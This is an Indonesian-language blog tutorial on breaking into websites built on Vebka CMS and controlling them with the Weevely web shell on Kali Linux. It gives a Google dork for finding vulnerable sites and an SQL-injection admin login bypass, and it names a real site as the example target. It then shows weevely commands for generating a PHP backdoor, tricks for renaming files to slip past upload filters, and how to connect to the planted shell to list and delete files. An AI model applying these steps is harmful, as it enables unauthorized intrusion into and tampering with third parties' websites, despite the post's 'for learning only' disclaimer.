Cara :: Hack Website Dengan Weevely Di Kali Linux 2.0 Sana

 Mungkin sudah banyak para Master yang buat Tutorial Cara Hack Website dengan Weevely di Kali Linux 2.0 Sana, dan ini hanyalah pembelajaran semata, biar tau bagaimana sedikit kerentanan terhadap website maka akan fatal.. baiklah eksklusif aja 

ikuti Step by Step :

Step Pertama Tanam Backdoor
Step Kedua Eksekusi 

Step Pertama

sebelumnya berbagai cara atau teknik-teknik yang dipakai untuk menanam suatu backdoor atau shell, pada tutorial kali ini , kita memakai teknik VEBKA CMS SHELL UPLOAD ikuti step by stepnya
[Baca : Cara Setting IP Address biar menjadi static di Kali Linux 2.0 Sana}

+ Exploit Title : Vebka Cms shell upload
+ Exploit Author : Ashiyane Digital Security Team
+ Vendor Homepage : http://www[dot]vebka[dot]si/
+ Google Dork : "Urejanje strani" "Uporabniško ime" "/admin"
+ Date: 01 - 01 - 2016
+ Tested On : Kali Linux 2.0 Sana
+ Test Website : http://www[dot]klima-dolinar[dot]si/
|-| Halaman admin => /admin/
|-| username: '=' 'or'
|-| password: '=' 'or'

[Baca : Cara Menggunakan Proxychains di Kali LInux 2.0 [Sana]]
Masukkan dorknya -->  "Urejanje strani" "Uporabniško ime" "/admin"  Ke "CLICK HERE"

maka akan muncul tab gres dengan tampilan menyerupai ini :

  

Pilih websitemya, dengan perhatikan link yang ditampilkan ,

(contoh : http://www[dot]klima-dolinar[dot]si )

[Baca : Cara :: Install Eclipse di Kali Linux 2.0 Sana ]

buka kemudian tambahkan Halaman Admin yang tertera di atas [ /admin/ ] dibelakang blognya, maka tampilannya akan menyerupai ini :

Masukkan Username dan Password diatas [ '=' 'or' ]

Syla 

bim

bim

:D

[Baca : Cara :: Menggunakan OpenVPN di Kali Linux 2.0 Sana ]

jikalau gagal terus ketika masukin username dan passwordnya, cari website lain ... :) cemungut yaa abang :v

[Baca : FIXED [!] Unable to get https://wpvulndb.com/data/local_vulnerable_files.xml.sha512 Kali Linux 2.0]

Selanjutnya cari dan cari untuk kita tanam backdoor nanti, jikalau untuk teknik ini, ketika buat postingan gres ada untuk upload file, upload image, upload video, upload lemari juga sanggup :v hahahahaha ....

berikut penampakkannya :)

untuk coba-coba, upload file berformat jpg atau php dulu, apa aja terserah
[Baca :FIXED error Failed to start metasploit.service: Unit metasploit.service failed to load: No such file or directory]
baiklah kita lanjut untuk buat backdoor dengan weevely ...

bagaimana cara menciptakan backdoor dengan weevely di kali linux 2.0 sana ? bagaimana cara memakai Weevely di Kali Linux 2.0 Sana ?

beginilah caranya ....

jeng

jeeng

jeeeenggg

wkwkwkwkwkwkw :v
Masukkan perintah berikut untuk melihat seluruh perintah di Weevely
[Baca : FIXED [!] ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/ ]

root@sarzafi: # weevely -h

masukkan perintah berikut untuk menciptakan backdoor :

root@sarzafi: # weevely generate password /root/admin.php

apabila backdoor berhasil dibentuk maka akan ada pemberitahuan menyerupai ini 

[Baca : FIXED wine: ‘/home/namauser/.wine’ is a 64-bit installation, it cannot be used with a 32-bit wineserver]


Generated backdoor with password 'password' in '/root/admin.php' of 1449 byte size.

root@sarzafi: # weevely generate password /root/admin.php

[Baca : Bahaya Virus CrypToWall]
generate : untuk menciptakan backdoor

password : isikan disini passwordnya, aku gunakan 'password' untuk password saya



/root/admin.php : Ini direktory atau lokasi backdoor ingin diletakkan dimana, sedangkan admin.php : ialah nama file backdoor yang dibuat

sesudah backdoor dibuat, maka upload pada website yang kita telah sanggup tadi, biasanya untuk file php akan di tolak, maka rename lah filenya

contohnya nama filenya admin.php ubah jadi admin.php.jpg , kemudian coba upload, jikalau masih tidak sanggup juga ubah jadi admin.php.jpg.php.jPg atau admin.PhP.jpg atau admin.PhP.jPg ubahlah hingga file sanggup diupload

[Baca:CARA :: MELAPORKAN SITUS PROVOKATIF , PORNOGRAFI, TINDAK KEKERASAN, DAN PELECEHAN SEKSUAL]

sesudah diupload, maka akan muncul nama file yang kita buat tadi, klik kanan pada link yang muncul kemudian pilih Edit Link , menyerupai ini :

 maka akan muncul menyerupai ini
[Baca : Aplikasi Android Mendapatkan Dollar dari Android (NO HOAX)]

copy link tersebut ... dan paste di notepad atau gedit atau leafpad ...
dan kita lanjut ke step berikutnya

[Baca : Cara Mendapatkan Uang dari Aplikasi Android]

Step Kedua Eksekusi

Buka weevely

root@sarzafi: # weevely

masukan perintah berikut :

root@sarzafi: # weevely [Link yang tadi di copy] [passwordnya]

contoh

root@sarzafi: # weevely http://www[dot]klima-dolinar[dot]si/userfiles/admin[dot]php.jpg[dot]php.jPg password

[/ jangan ikutin [dot] nya, itu hanya referensi /]

apabila pada terminal muncul menyerupai ini :

weevely>

maka masukkan lagi passwordnya

jeng jeng jeng jeeeeng :D kini website berada di terminal anda, terserah mau di apain, asal jangan ditebas indexnya  :)

sesudah masuk yang tadinya   

root@sarzafi: # menjadi server1.vebka.si:/var/www/clients/client1/web49/web/userfiles $

masukkan perintah :

ls = untuk menampilkan

remove [nama file] = untuk menghapus file :D sisanya coba-coba aja ya :)

berikut penampakkannya

  untuk melihat Bantuan pada Weevely masukkan perintah :
:help
berikut tanda bagi [ : ]

Hapus Backdoor orang laen :D hahaha

demikianlah Cara Hack Website dengan Weevely di Kali Linux 2.0 Sana

TUTORIAL INI HANYALAH PEMBELAJARAN SEMATA, BUKAN UNTUK BANGGA BANGGAN ATAU SOMBONG-SOMBONGAN DI SOSMED ... SEKIAN DAN TERIMA KASEEEHHHHHHH

semoga bermanfaat

Bagikan Artikel ini